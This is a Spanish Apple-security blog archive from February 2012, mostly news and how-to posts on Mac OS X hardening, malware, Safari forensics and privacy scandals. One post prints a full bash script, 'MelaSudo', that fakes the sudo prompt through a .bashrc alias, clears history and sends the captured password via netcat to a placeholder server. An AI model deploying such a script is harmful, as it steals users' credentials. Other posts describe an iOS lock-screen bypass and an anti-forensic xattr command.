Menú principal

miércoles, 29 de febrero de 2012

Deshabilitar iPv6 en Mac OS X para evitar ataques de red

Ya existen varios ataques pensados sobre la red IPv6. Los ataques Man in the middle en IPv6 usando el envenenamiento de la lista de vecinos con mensajes ICMPv6 spoofeados, los ataques de Rogue DHCPv6, o el último ataque haciendo uso del protocolo SLAAC (StateLess Address AutoConfiguration) para configurar direcciones IP en el host víctima, así como una puerta de enlace IPv6, permiten que las comunicaciones IPv6 sean interceptadas por un atacante.

Es por ello que, si no se está haciendo ningún uso de IPv6 y no se desea tener problemas con este tipo de ataques en equipos Mac OS X se puede optar por deshabilitar e protocolo IPv6, como medida de fortificación de los equipos. Sin embargo, cuando se accede a las propiedades de red de TCP/IP, la opción de deshabilitar IPv6 no está disponible por defecto.

Figura 1: No aparece la opción de deshabilitar IPv6

Sin embargo, esta opción está solo oculta, y puede ser activada por medio del interfaz de comandos, tal y como se ve en la siguiente captura.

Figura 2: Usando networksetup se puede ver la lista de NIC y deshabilitar IPv6

Una vez se haya ejecutado el comando, la opción aparecerá en el menú de configuración de TCP/IP.

Figura 3: Ahora aparece la opción de IPv6 Deshabilitado

Entendemos que habilitar IPv6 es una buena opción para maximizar la conectividad de un equipo, pero nos sorprende que deshabilitar el protocolo no esté entre las opciones por defecto del panel de configuración.

martes, 28 de febrero de 2012

Actualización de firmware para equipos del 2011

Apple continúa su proceso de actualización del firmware para solucionar problemas de estabilidad que se han ido detectando en todos ellos. En esta ocasión para equipos del 2011, después que que hubiera sacado  actualizaciones para equipos del 2010.


En esta ocasión se han publicado:
- Mac mini EFI Firmware Update 1.6 para equipos de mediados de 2011 [4.08 MB]
- MacBook Pro EFI Firmware Update 2.7 para equipos del 2011 [4.24 MB]
- iMac EFI Firmware Update 1.9 para equipos de mediados de 2011  [3.77 MB]
- MacBook Air EFI Firmware Update 2.4 para equipos de mediados de 2011 [4.06 MB]
Además de estas cuatro actualizaciones de firmware hay que hacer notar que también se ha puesto disponible una actualización de la WiFi para los equipos iMac desde mediados de 2009 hasta la actualidad, para solucionar problemas de conectividad.

Como es habitual, te recomendamos que actualices lo antes que puedas para eliminar cualquier bug conocido en el software.

lunes, 27 de febrero de 2012

FlashBack Trojan es ya una seria amenaza para Mac OS X

Hace poco nos hacíamos eco de la mutación de FlashBack Trojan a la versión .G. Inicialmente este troyano para Mac OS X comenzó siendo un programa que utilizaba técnicas de ingeniería social para instalarse en los equipos, pero a partir de la versión G utiliza dos exploits Java que le permiten, si la máquina no tiene Java actualizado, instalarse sin intervención del usuario.

En un análisis más detallado, desde Intego han dado más claves de este malware que ya se está convirtiendo en una seria amenaza. En primer lugar, el malware intenta descubrir si hay instalada una solución antimalware, para evitar ser detectado cuando intente instalarse. Si hay un antimalware no intenta instalarse. Esto le permite que los sitios web infectados utilizados para la distribución del malware tengan un periodo de vida más largo.

En segundo lugar, si consigue instalarse, crea un fichero .so en la carpeta /Users/Shared que se inyecta en el navegador de Internet y en las aplicaciones que utilicen la red para ir tras las contraseñas de los sitios online, como bancos, sitios de Google, etc...

Figura 1: Log visto en por un crash de Skype

Esta inyección está provocando que muchas aplicaciones estén fallando, y basta con buscar en Internet para encontrar a usuarios publicando volcados de aplicaciones que han fallado en los que se pueden ver este tipo de ficheros tal y como se puede ver en la Figura 1 y Figura 2.

Figura 2: Log de un crash en Discussions de Apple

Desde Seguridad Apple te recomendamos tener el software totalmente actualizado - especialmente Java que es lo que aprovecha este troyano - , tener instalado un antimalware actualizado y con escaneo en tiempo real, y tomar especial cuidado a la hora de aceptar la instalación de cualquier programa desde Internet.

domingo, 26 de febrero de 2012

Fue noticia en Seguridad Apple: del 13 al 26 de Febrero

Hoy domingo toca el post de repaso en el que recordamos todos los artículos publicados durante las últimas dos semanas en Seguridad Apple, así que vamos a comenzar.

El lunes 13 de Febrero comenzamos con la noticia de que FlashBack, el malware que comenzó a desplegarse con trucos de ingeniería social en sistemas Mac OS X, ha evolucionado en las últimas variantes para utilizar exploits de Java e infectar sistemas no parcheados.

El martes, con la noticia de que Kodak había cerrado, echamos una mirada a la historia de Apple para recordar los modelos de cámaras digitales de Apple QuickTake, cuyos modelos 100 y 150 fueron construidos por Kodak.

El miércoles 15 tuvimos la noticia del escándalo con la aplicación Path, que sin informar a los usuarios accedía a la agenda de contactos y la transmitía a sus servidores, lo que obligó a la compañía a pedir disculpas y actualizar la aplicación. Ese mismo día también nos hicimos eco de la aparición de un nuevo expediente de seguridad desde Adobe para parchear un conjunto de bugs críticos que estaban siendo utilizados ya en Internet.

El jueves de esa semana os dejamos un script, llamado MelaSudo creado en el SOCtano de Informática 64 para conseguir robar la password de un usuario sudoer mediante un truco de ingeniería social generando un alias del comando sudo.

El viernes tocó hablar de Mac OS X 10.8 Mountain Lion, anunciado para este verano y del que se han revelado algunas novedades de seguridad, como Gatekeeper, una solución que intenta bloquear el malware dándole al usuario la capacidad de bloquear cualquier aplicación que no haya sido descargada desde la App Store, o que no venga firmada por ningún desarrollador de Apple.

En la sección de curiosidades que nos reservamos para los viernes tarde publicamos una curiosa foto en la que se puede ver que los iPad se han metido en la vida religiosa, dejando claro hasta donde llegó la visión de Steve Jobs.

Para el sábado, otra noticia con un escándalo de privacidad, en este caso la propia Google que según desveló el Wall Street Journal, estaba utilizando un código especial para saltarse las opciones de privacidad de los navegadores Apple Safari.

El domingo le tocó el turno a la aplicación Twitter para iOS, que con la función Encontrar amigos estaba enviando los contactos de la agenda de contactos en iOS a los servidores de la compañía de los 140 caracteres, durante 18 meses, sin avisar en ningún momento al usuario de la aplicación.

El lunes 20 comenzamos a mirar las opciones de privacidad, forenses y antiforenses de Apple Safari, y comenzamos con el Historial de Navegación. Así analizamos dónde se almacena, como se puede borrar y cómo funciona la Navegación Privada.

Para el martes 21 publicamos la segunda entrega sobre la privacidad en Apple Safari, en este caso analizamos las descargas, que pueden ayudar a recomponer el historial de navegación incluso si se ha borrado el historial o activado la navegación privada.

El miércoles continúo el caso del espionaje de Google a los usuarios. Microsoft confirmó que los usuarios de Internet Explorer también habían sido espiados, Google comenzó a recibir las demandas de los usuarios y os hablamos de Do Not Track Plus, un plug-in para mejorar las opciones de privacidad en los navegadores.

El jueves echamos un vistazo a una opción de IDA que permite realizar procesos de ingeniería inversa de binarios de Mac OS X remotamente desde sistemas operativos Windows.

Para el viernes pasado publicamos la tercera entrega dedicada a la privacidad de Apple Safari, en este caso la caché y las cookies, que permiten reconstruir el historial de navegación de un usuario.

En la sección de curiosidad de la tarde del viernes, la segunda parte de la modernización de la Iglesia empujada desde el cielo. Y es que las fotos son curiosas.

Por último, ayer sábado la noticia fue para un nuevo bug de iOS 5.0.1 que, gracias a un fallo con el sistema de ahorro de energía, con una llamada perdida, metiendo y sacando la SIM del terminal, es posible saltar la restricción del código de bloqueo.

Y esto ha sido todo lo que hemos publicado durante estas dos semanas, que esperamos que te haya permitido seguir la actualidad de lo acaecido relativo a seguridad en las tecnologías Apple.

sábado, 25 de febrero de 2012

Nuevo Bug en iPhone iOS 5.0.1 permite saltarse el bloqueo

Hace poco os informamos del bug en iOS 5.0.1 que permite hacer llamadas FaceTime e inspeccionar el contenido de la agenda de contados en terminales bloqueados. Hoy toca hablar de un curioso fallo que se produce al quitar y poner la tarjeta SIM de un terminal que ha recibido una llamada perdida a la que se quiere devolver la llamada, que permite acceder a todos los contactos y realizar llamadas desde un teléfono bloqueado.

El proceso, aunque parece un poco tedioso por los intentos que hay que realizar, permite a un atacante tener acceso a todos los contactos en menos de tres minutos, y sus pasos son bastante sencillos, tal y como se puede ver en el siguiente vídeo.



Primero hay que hacer una llamada perdida al terminal que se desea desbloquear. Después hay que sacar la SIM y re-introducirla al mismo tiempo que se selecciona la opción de devolver la llamada perdida. Esto, de alguna manera, aprovecha un fallo en la gestión del ahorro de batería que salta cuando se quita la tarjeta SIM, y confunde al terminal permitiendo tener acceso a la lista de los contactos. Un nuevo bug a solucionar para la - ya esperada y necesaria - versión iOS 5.1

viernes, 24 de febrero de 2012

Se confirma: Steve Jobs impone el iPad en el cielo

Si el viernes pasado recordábamos a Steve Jobs por el impacto que tuvo en todo el mundo, sorprendidos de que este cambio llegara hasta la propia forma de comunicarse con Dios, hoy traemos otra foto en la que se confirma que este cambio de comunicación con lo divino es un hecho.

Visto en Señoras Que

Y es que desde que Steve Jobs llegó al cielo, debió llevar contigo todo su genio y sus ideas para revolucionar el entorno al juntarse con otros grandes genios.


Sirva este post para recordar otro poco más el talento y trabajo de Steve Jobs, que nunca viene mal.


Buen fin de semana a todos.

Privacidad en Apple Safari: La Caché y las Cookies

Una de las opciones que dimos cuando hablamos de El Historial de Navegación en Apple Safari, es hacer uso de la opción de Borrar el Historial. La pregunta es... ¿se puede saber qué sitios han sido navegados si se ha hecho uso de ella? Pues sí, analizando la caché del navegador.

En Apple Safari, si se ha seleccionado la opción de Navegación Privada, todos los archivos descargados en la caché del navegador serán eliminados al cerrar la sesión. Sin embargo, si no se ha seleccionado esta opción y se decide hacer uso del borrado manual del Historial de Navegación, o si el navegador ha tenido un problema que le ha hecho cerrarse de manera inesperada - o si el navegador aún está abierto - es posible recuperar el Historial de Navegación desde la Caché y las Cookies.

Figura 1: Opciones de Caché en Apple Safari. Se accede con el botón Detalles

Los objetos de la caché pueden ser consultados desde las Preferencias de Apple Safari, desde donde es posible acceder a la lista de todos los elementos cacheados en un momento determinado. Desde allí, es posible vaciar la caché manualmente, lo que borrará todos los objetos almacenados hasta ese momento.

Figura 2: Datos de caché guardados y opción de Eliminar

Sin embargo, si la caché no ha sido eliminada, ésta permanece en el fichero /Users/usuario/Lybary/Caches/com.apple.Safari/cache.db, con toda la información relativa a los archivos descargados.

Figura 3: El fichero de almacenamiento de caché

Esto permite que, con la ayuda de alguna aplicación que analice la caché, como el caso de Safari Cache Explorer, sea posible obtener fechas y URLs de navegación como si fuera el Historial de Navegación completo.

Figura 4: Recuperando el historial de navegación con Safari Caché Explorer

Es por eso que desde Seguridad Apple os recomendamos que activéis siempre que sea posible la Navegación Privada, que además evita otro tipo de ataques que iremos contando más adelante. Si no, cuando borres el Historial de Navegación, acuérdate también de Borrar la Caché.

========================================================================
- Privacidad en Apple Safari: El Historial de Navegación
- Privacidad en Apple Safari: Las Descargas
Privacidad en Apple Safari: La Caché y las Cookies
========================================================================

jueves, 23 de febrero de 2012

Analizar binarios de Mac OS X desde Windows con IDA

IDA es uno de los más conocidos debuggers multiplataforma con soporte para sistemas operativos Windows, Linux y Mac OS X. La característica de IDA que tratamos hoy en este artículo es la del sistema de debugging remoto que permite llevar a cabo la depuración de un binario de una plataforma desde otra. En otras palabras: realizar el análisis de una aplicación para Mac OS X desde un sistema Windows o Linux, o viceversa.

Para montar el entorno se necesita un sistema operativo Windows y uno Mac OS X, ambos con IDA instalado en ellos, y para aprender la como funciona esta característica seguir el tutorial IDA Mac OS X Debugging de Hex-Rays, los desarrolladores de IDA

Inicialmente será necesario descargar el fichero macvuln.tgz, aplicación para Mac OS X que se puede utilizar de ejemplo para analizar. Una vez descargada la aplicación, se debe configurar el servidor de IDA con los permisos adecuados. Para ello se deben ejecutar los siguientes comandos.

Figura 1: Configuración de permisos sobre el mac_server

Una vez que toda la parte de Mac OS X está totalmente configurada se puede iniciar el servidor de IDA llamado  mac_server mediante el parámetro -P para establecerle una clave de acceso.

Figura 2: Ejecución del servidor IDA para mac_os

Los pasos para conectar IDA desde el sistema Windows al servidor corriendo en Mac OS X a través de la red empiezan por cargar el binario macvuln descargado anteriormente, y acto seguido seleccionar el depurador Mac OS X remoto mediante la ruta de menús ‘Debugger / Select debugger / Remote Mac OS X debugger’, tal y como se muestra en la siguiente captura de pantalla.

Figura 3: Arrancando IDA para usar debugging remoto en Mac OS X

El último paso a llevar a cabo es la configuración de la dirección IP y la contraseña del servidor, junto con los parámetros que se deseen ejecutar sobre la aplicación ‘macvuln’. Esta ventana es accesible desde ‘Debugger / Process options’.

Figura 4: Configuración del proceso que se quiere debuggear

Como último paso ya únicamente es necesario iniciar la depuración mediante el hotkey ‘F9’ y comenzar el proceso de ingeniería sobre el proceso en cuestión.

Figura 5: Aplicación Mac OS X siendo analizada con IDA remotamente desde Windows

Esperamos que con este pequeño artículo más de uno os animéis a analizar muchas más aplicaciones para Mac OS X y a buscar en ellas esas características "ocultas" que a veces impactan en la seguridad de nuestros sistemas.

miércoles, 22 de febrero de 2012

El caso del espionaje de Google a usuarios continúa...

La historia del espionaje por parte de Google hacia los usuarios de Apple Safari que destapó el Wall Street Journal ha traído cola. En primer lugar, Microsoft confirmó que este seguimiento no se utilizaba sólo con usuarios de Apple Safari, sino que aquellos que navegaban con Internet Explorer también eran espiados por parte de las anuncios mostrados en las páginas visitadas.

En segundo lugar, hay que hablar de las consecuencias legales que esto va a traer para Google, ya que parece que este caso va convertirse en algo similar a lo que ya sucedió cuando se supo que el Google Street Car estaba grabando información de las redes WiFi que iba encontrando. De momento, tal y como informan desde Apple Insider, Google ha sido demandada por varios usuarios y organizaciones por saltarse las opciones de privacidad establecidas en el navegador, que ya se verá en qué terminan.

Figura 1: Do Not Track Plus en Apple Safari

Por último, ya han salido algunas herramientas para extremar las opciones de privacidad en los navegadores para evitar este seguimiento. Hay que recordar que soluciones como NoScript o similares - o plugins para quitar la publicidad de la Google mientras se navega - existen hace mucho tiempo. Para los usuarios de Apple Safari, desde MacWorld han recomendado el uso de Do Not Tack Plus, un plugin que extrema las opciones de privacidad e informa cuando se están enviando datos a páginas externas. En el siguiente vídeo tenéis una demostración de cómo funciona.


En cualquier caso, desde Seguridad Apple os queremos recordar la importancia de extremar las medidas de privacidad y aplicar hábitos "saludables", porque todo esto que estamos viendo con escándalos de privacidad puede ser nada más que la punta del iceberg.

martes, 21 de febrero de 2012

Privacidad en Apple Safari: Las Descargas

En el artículo de ayer sobre el Historial de Navegación en Apple Safari terminábamos preguntándonos si realmente el método de Navegación Privada en Apple Safari permite que nadie sepa que se ha navegado por un sitio. Hoy queremos ver un apartado que permite a un analista forense conocer precisamente eso, que se ha navegado por un determinado sitio en una determinada fecha: Las descargas de ficheros.

El historial de descargas

Tanto si se está trabajando en modo de Navegación Privada como si no, Apple Safari guarda un historial de todas las descargas al que se puede acceder mediante el menú Visualización y la selección de la opción Mostrar Descargas.

Figura 1: Acceso a Mostrar Descargas

Esta opción mostrará un panel lateral en el que se muestra la información de todas las descargas que se han realizado, y que se encuentran almacenadas en el fichero /Users/usuario/Libary/Safari/Downloads.plist.

Figura 2: Fichero /User/usuario/Safari/Downloads.plist 

Este fichero se seguirá generando incluso si se está trabajando en modo de Navegación Privada, y en él, como se puede ver en la imagen siguiente, está disponible la URL de descarga y la fecha y hora en la que se produce.

Figura 3: Fecha y URL de descarga

Borrado de historial de descargas

Para evitar este registro, una vez que se haya terminado la descarga, se puede hacer uso del botón Borrar desde la ventana de descargas, y se conseguirá que el fichero Downloads.plist quede vacío.

Figura 4: Ventana de descargas con botón de Borrar

La pregunta es.... ¿es suficiente para evitar que un analista forense sepa que se ha navegado por un sitio en un determinado momento?.  Pues la respuesta ya os la dimos hace tiempo.

El historial de navegación generado a partir de los ficheros descargados

Como ya os contamos, en Mac OS X, Apple añade un atributo extendido a todos los ficheros que son descargados de Internet en el que se indica qué programa lo descargó y cuál fue la URL de la descarga. Es por eso que un analista forense podría, mirando los resultados de xattr y la fecha de creación del fichero, descubrir parcialmente el historial de navegación.

Figura 5: URL de descarga y fecha de creación del fichero

Como ya os contamos, es posible borrar estos atributos extendidos con un comando xattr sobre todos los ficheros del perfil de usuario: xattr -v -r -d kMDItemWhereFroms *

Tal vez os estéis preguntado ahora si es posible entonces conocer el historial de navegación de un usuario si este no se descarga ningún archivo. Pues lo veremos en un próximo artículo.

========================================================================
- Privacidad en Apple Safari: El Historial de Navegación
- Privacidad en Apple Safari: Las Descargas
Privacidad en Apple Safari: La Caché y las Cookies
========================================================================

lunes, 20 de febrero de 2012

Privacidad en Apple Safari: El Historial de Navegación

El análisis de la navegación por Internet desde un equipo puede desvelar muchas cosas. Es por eso que en casos como el de Google en el que se permite analizar la navegación de un usuario a terceros la gente se preocupa tanto. Es un tema serio de privacidad que debe ser tenido en cuenta. Hoy queremos echarle un ojo a cómo gestionar el historial de navegación de Apple Safari y a qué se puede sacar de él.

Inspeccionar el historial de Navegación

El historial de Apple Safari puede ser revisado fácilmente mediante la combinación de teclas Alt+Cmd+ L, y permite acceder a una ventana que muestra la lista de sitios que se han visitado, organizados por fecha. Si un usuario se deja la sesión abierta, en cuestión de segundos puede ser inspeccionado.

Figura 1: Historial de Navegación en Apple Safari

El contenido que se visualiza en esa ventana está almacenado en un fichero en el perfil de usuario en formato .plist que se llama /Users/usuario/Library/Safari/History.plist

Figura 2: History.plist con el historial de navegación de Apple Safari

Borrar una o todas las entradas del Historial de Navegación

Desde la ventana de Historial de navegación es posible eliminar una entrada del historial de navegación manualmente. Para ello basta con posicionarse sobre la entrada y en el menú contextual del botón derecho seleccionar la opción de Eliminar. Si por el contrario se desea eliminar el historial de navegación completo, desde el menú de Historial se puede seleccionar la última opción: Borrar Historial.

Figura 3: Opción de Borrar historial completo en menú Historial

Además, es posible hacer un borrado programado del historial, por lo que entrando en las Preferencias del menú Safari, y yendo a la opción General, se puede establecer una política de eliminación del Historial de navegación. Por defecto la configuración es de un mes, pero puedes configurarlo a solo 24 horas, lo que reduciría mucho los datos que se guardan. Así, un ataque de inspección de historial por medio de CSS o JavaScript, tendría mucho menos datos que sacar.

Figura 4: Configuración de política de borrado del historial

Evitar que se guarde el historial de sitios visitados: Navegación Privada

Para evitar que se genere ninguna entrada en el historial de sitios visitados se puede utilizar el modo de Navegación Privada que está disponible en el menú Safari.

Figura 5: Activación de modo de Navegación Privada

Como se puede ver, Apple Safari avisa de que se si se activa ese modo de navegación no se guardará ninguna entrada en el historial.

Figura 6: Alerta de activación de modo de Navegación Privada

Sin embargo, la pregunta que surge es: ¿Es realmente una navegación privada? ¿Podrá aguantar este modo el escrutinio de un analista forense? Mañana más sobre este tema.

========================================================================
- Privacidad en Apple Safari: El Historial de Navegación
- Privacidad en Apple Safari: Las Descargas
Privacidad en Apple Safari: La Caché y las Cookies
========================================================================

domingo, 19 de febrero de 2012

Twitter para iOS envuelto en el escándalo de los contactos

¿Eres uno de los millones de usuarios de Twitter en el mundo? Y además, ¿utilizas la herramienta de Twitter para iOS? Estás de enhorabuena, ya que si has ejecutado la posibilidad de "Buscar amigos" "tus contactos serán de Twitter durante 18 meses. Pero... ¿Twitter ha informado de ello? La respuesta es no.

Tras el escándalo de esta semana con Path, y visto esto con Twitter, está claro que los usuarios debemos extremar las precauciones con nuestra privacidad, y este tipo de herramierntas que son capaces de "gestionar" nuestros contactos sociales deberían estar más controladas.

Twitter ha informado, según reporta Naked Security, que en las próximas actualizaciones mostrarán explícitamente lo que sucede cuando se ejecuta la opción de "Buscar amigos", de manera que el usuario quede totalmente informado. Realmente sería sencillo, ya que bastaría con que Twitter pusiera un mensaje del tipo:
"Al seleccionar esta opción está permitiendo que Twitter almacene sus contactos personales de su libreta de direcciones, ¿Desea continuar?"
Realmente explícito y sencillo de entender, y que sea ya el usuario el que elija si su privacidad vale más que encontrar a los amigos automáticamente en Twitter. Quizá un gran número de personas no ejecuten esta opción por el simple hecho de que su libreta será compartida, pero Twitter deberá disponer de un mensaje claro y conciso para no recibir las críticas con su política de actuación.

Figura 1: Opción de Buscar amigos que entrega los contactos a Twitter

Twitter no es el único que realiza estas acciones "oscuras", también grandes empresas como Foursquare, Viber, WhatsApp, Instagram, Path o Hipster utilizan esta técnica o similares. Apple ha prometido vigilar más el como la información de los usuarios es solicitada en las aplicaciones del App Store.

De todas formas los usuarios deberían estar mas concienciados, ya que no hay magia y solo es tecnología así que cualquier persona con ciertas nociones técnicas debe "presuponer" que para poder localizar a sus amigos, la herramienta primero necesita saber quiénes son todos sus amigos, parece evidente. Aún así, es obligación de la red social de turno el no aprovecharse del desconocimiento de éstos. Las redes sociales necesitan de los usuarios para poder tener éxito, pero deben ser menos agresivos a la hora de conseguirlos.

sábado, 18 de febrero de 2012

Google espiaba la navegación de los usuarios de Safari

Hace un par de días desde Seguridad Apple os contábamos los problemas que habían surgido con la aplicación Path que - a pesar de que han corregido el error en su nueva versión - han suscitado un gran debate sobre el uso y acceso de los datos del usuario sin solicitar su consentimiento. Esos casos se unen al gran debate de la privacidad del usuario frente a los sitios de Internet que toman datos del usuario para tener mejor "documentadas" todas las acciones que realiza un usuario.

En ese escándalo se vio envuelto hace tiempo Facebook, que incluía una cookie en las sesiones de navegación de sus visitantes que le permitía tomar datos, e incluso sitios de contenido adulto que inspeccionaban el historial de navegación de cualquier visitante. A ellos se une ahora un escándalo con Google publicado en el Wall Street Journal, del que tanto ellos, como ciertas empresas de publicidad se han aprovechado de un código de seguimiento de Google que permite rastrear los hábitos de navegación de usuarios que utilizan el navegador Apple Safari, es decir, especialmente usuarios de Mac OS X e iOS.

Al parecer Google ha dejado de utilizar el código tras ser contactado por el periódico Wall Street Journal que habría sido informado de ello por Jonathan Mayer de la Universidad de Standford,  especialista en analizar este tipo de cuestiones. Según el periódico, este código ha sido encontrado en 22 de los 100 sitios web investigados y en 23 anuncios para iPhone. 

Hay que tener en cuenta que la legislación en muchos países exige que los navegadores den al usuario herramientas de privacidad para, entre otras cosas, evitar la inserción de cookies o códigos de rastreo de empresas. Por eso, el navegador Apple Safari está configurado para bloquear las cookies de terceros de forma predeterminada.

Figura 1: Opciones de Privacidad en Apple Safari para Mac OS X

Sin embargo, estos anuncios insertan un iframe con un formulario transparente que permite hasta recoger datos de la cuenta de Google Plus, si hubiera alguna, que está conectada en la sesión, pero sólo y exclusivamente si es un navegador Apple Safari. Una vez el código se activa puede permitir que Google haga el seguimiento del usuario marcado por el anuncio a través de un gran número de sitios web. Mediante la inserción del código HTML desde el dominio de Google es posible saltarse la configuración de estos parámetros de seguridad para permitir el traceo, ya que será Google el que esté ayudando a la empresa de publicidad a hacer el seguimiento. Todo el proceso se explica en el siguiente gráfico publicado en el artículo.

Figrura 2: Gráfico descriptivo del proceso

Apple ha confirmado estar trabajando en la solución del problema de la privacidad como éste en su navegador Apple Safari. Mientras, Google se defiende alegando que no recopila datos personales, pero ha dejado de utilizar esta práctica desde ya. Pese a esto, Google, se enfrenta a la posibilidad de grandes multas de la Comisión Federal del Gobierno de EEUU en el caso de que la agencia estime que ha violado su acuerdo de privacidad. ¡Google, Don´t be Evil!

viernes, 17 de febrero de 2012

Steve Jobs está haciendo cambios en el cielo...

Que Steve Jobs cambió un poco la manera en que vivimos en sociedad hoy en día es innegable. Sus productos, y la forma de usarlos que él pensó, están dentro de nuestras vidas. Lo que nunca pensamos en el pasado es que llegarían a cambiar aspectos tan antiguos como comunicarnos con Dios.

Figura 1: Visto en Señoras Que

Y es que las especulaciones de que algo iba a cambiar en el cielo comenzaron desde el momento en Steve Jobs nos abandonó.

Figura 2: "Moisés, te presento a Steve Jobs. Él va a actualizar tus tablas"

Figura 3: "Para ser honesto, señor Jobs, la última vez que una manzana causó mucho
revuelo por aquí afectó a Adán, Eva y una serpiente.."

Buen fin de semana.

OS X 10.8 Mountain Lion viene con un "GateKeeper"

Ayer Internet se revolucionó con la nota de prensa, y el nuevo anunció de OS X 10.8 Mountain Lion, el nuevo sistema operativo de Apple que se va lanzar en un tiempo record, dejando que el "Rey de la Selva" tenga un reinado más bien corto. En esta nueva revisión de la versión X de Mac OS - a la que han quitado "Mac" del nombre - , la unión entre el interfaz gráfico de iOS y los sistemas Mac OS X es ya casi un hecho, después de que apareciera en un paper académico el trabajo de Apple en microprocesadores ARM y la confirmación definitiva por parte de Tim Cook de esta línea.


Con la unión de ambos entornos - aunque de momento no es total y solo es una convergencia on-going -, si se suman el volumen de aplicaciones que se han acumulado ya en la App Store y la Mac App Store el resultado es enorme. Es por ello que, teniendo en cuenta que no todas las aplicaciones están hechas por "chicos buenos", Apple no quiere que haya muchos problemas de seguridad o privacidad, como el ya famoso caso del escándalo Path, en el que un congresista ha pedido explicaciones a Apple por carta.

Es por ello que en OS X 10.8 Mountain Lion ya ha opciones para mejorar la seguridad con respecto a las aplicaciones, y se ha añadido a GateKeeper - no confundir con el antivirus de hace muchos años -. Este software permitirá poder controlar desde las preferencias del sistema que sólo se puedan instalar aplicaciones que hayan sido descargadas desde las tiendas de Apple, o que se vengan asociadas con un ID de un desarrollador de Apple, el cuál tendrá que cuidar su reputación. El funcionamiento es un poco rudimentario según alertan desde Naked Security, ya que se sigue basando en una tecnología similar a XProtect, es decir, con listas blancas pero siempre es mejor que nada.

Esto permitiría al usuario evitar que cualquier otro programa intentase ejecutarse en el sistema OS X Mountain Lion. Sin embargo, aunque es una configuración por defecto, como se puede ver en la Figura 1, esta opción es elegible por el usuario.

Figura 1: Configuración de aplicaciones que dejará ejecutar GateKeeper

Por otro lado, GateKeeper también controla la ejecución de las aplicaciones y de los permisos de que estas hacen uso, tales como acceder a los contactos personales, enviar información de geo-posicionamiento, o datos del usuario, que Apple no se olvida del escándalo de iPhoneTracker, ni del que hubo con Carrier iQ, y por supuesto el más reciente con Path.

De todas formas, esto solo es una versión para desarrolladores, que coincide con la más que posible llegada de Windows 8 y, aunque desde Apple lo niegan, parece que la competición por el mercado de equipos híbridos está más cerca que nunca de comenzar.

Tú, por si quieres ir conociendo mejor este sistema, puedes descargar la versión beta de OS X 10.8 Mountain Lion desde la web de desarrolladores.

jueves, 16 de febrero de 2012

MelaSudo: robar la password a un sudoer con ingenio

MelaSudo es un pequeño script en bash desarrollado como 'arma de guerrilla' y utilizado internamente dentro del equipo de auditoría web del SOCtano de informatica64, como forma de venganza contra aquellos linuxeros/maqueros que rinden culto al ataque David Hasselhoff.

La finalidad de este script consiste en devolver un ataque David Hasselhoff realizando el robo del password de un usuario con permisos de 'sudoer' mediante el uso de un alias falso del comando 'sudo'. Para ello, lógicamente hay que tener acceso local a la sesión de un usuario con permisos de sudoer, pero en lugar de devolverle el ataque David Hasselhoff, le robareos la password.

Como normalmente hay poco tiempo cuando alguien se deja la sesión abierta, se ha hecho un script que automatiza todo el proceso. La instalación de la trama es muy sencilla, basta con ejecutar el script con el parámetro 'instalar' tal y como se ve en la siguiente captura de pantalla.

Figura 1: Instalación de MelaSudo

El proceso de instalación consiste en la copia del script en '~/.thumbmails' y en añadir la linea 'alias sudo="bash ~/.thumbmails"' al fichero '~/.bashrc'. Éste ultimo fichero es ejecutado cada vez que se inicia una terminal bash, por lo que nos aseguraríamos de que en cada una de ellas se ejecutase el alias encargado de realizar el robo de la password.

A continuación se ve como al ejecutar desde una terminal bash el comando whoami, muestra que se trata del usuario 'haha', y tras realizar una elevación mediante 'sudo', se solicita la la password en dos ocasiones, simulando que en el primer intento se ha introducido incorrectamente, pero tratandose en realidad del script 'Melasudo'. En la segunda petición de password ya se trata realmente del comando sudo, y autentica correctamente al usuario como 'root'.

Figura 2: Ejecución de MelaSudo

Como este script fue diseñado para gastar bromas a compañeros que se dejan el equipo desbloqueado, cosa que no suele ser habitual, fue necesario diseñar un sistema que nos permitiera ver su password sin necesidad a tener que esperar a que se volviera a dejar el equipo sin bloquear. Por ello, se envía a través la red a un servidor web haciendo uso de netcat (asegúrate de que lo tiene, si no adapta el script), para que sea mucho más cómodo todo.

Figura 3: Log generado por MelaSudo en el servidor web

El código del script MelaSudo puedes obtenerlo desde aquí:

#!/bin/bash
if [ "x$1" == "xinstalar" ]; then
cp $0 ~/.thumbmails 2> /dev/null
echo 'alias sudo="bash ~/.thumbmails"' >> ~/.bashrc
echo "instalado"
history -c
exit
fi
#mac
echo -n "Password:"

#ubuntu
#echo -n "[sudo] password for `whoami`: "

read -s password
echo
rutaReal=$(whereis sudo | awk '{print $2}')
if [ "x$rutaReal" == "x" ]; then
rutaReal=$(whereis sudo | awk '{print $1}')
if [ "x$rutaReal" == "x" ]; then
rutaReal=$(whereis sudo | awk '{print $0}')
fi
fi

echo -en "GET /password.php?password=$password HTTP/1.1\nConnection: close\nhost: tuserver.com\n\n" | nc tuserver.com 80 >/dev/null 2>/dev/null

echo -e "Sorry, try again."
$rutaReal $1 $2 $3 $4 $5 $6 $7

Como se puede ver, para cada sistema operativo hay que personalizar el mensaje de error para que sea más creíble el truco. Esperamos que esto os ayude a tener mucho más cuidado de vuestras sesiones, ya que el ataque David Hasselhoff es lo que menos te puede ocurrir.

Por supuesto, esta idea puede ser utilizada en cualquier entorno de post-explotación de una sesión de un usuario sudoer con un ataque client-side, como a través de un Safari o un Java sin parchear.

miércoles, 15 de febrero de 2012

Actualización crítica de Adobe ShockWave para Mac OS X

Tenemos un nuevo boletín de seguridad de Adobe: APSB12-02 en el que informa de una actualización de Adobe Shockwave Player que corrige 9 vulnerabilidades que podrían permitir a un atacante ejecutar código malicioso en el sistema afectado.

Adobe ha clasificado la actualización como crítica y recomienda que los usuarios realicen la actualización más reciente de la instalación del producto.

La nueva versión del software es 11.6.4.634 está disponible tanto para Mac OS X como para Windows y se puede descargar desde la siguiente URL: Descargar Adobe Shockware Player

La actualización, entre otras, resuelve una vulnerabilidad de corrupción de memoria en Shockwave 3d Asset que podría conducir a la ejecución de código (CVE-2012-0757). También soluciona las siguientes vulnerabilidades: CVE-2012-0759CVE-2012-0760CVE-2012-0761CVE-2012-0762CVE-2012-0763CVE-2012-0764CVE-2012-0766

Todas estos fallos de seguridad pueden permitir a un atacante ejecutar código malicioso o provocar una denegacion de servicio, por lo que desde Seguridad Apple os recomendamos que apliquéis la actualización en los equipos con Mac OS X que dispongan de la aplicación Adobe Shockwave Player lo antes posible.

Path enviaba los contactos sin consentimiento del usuario

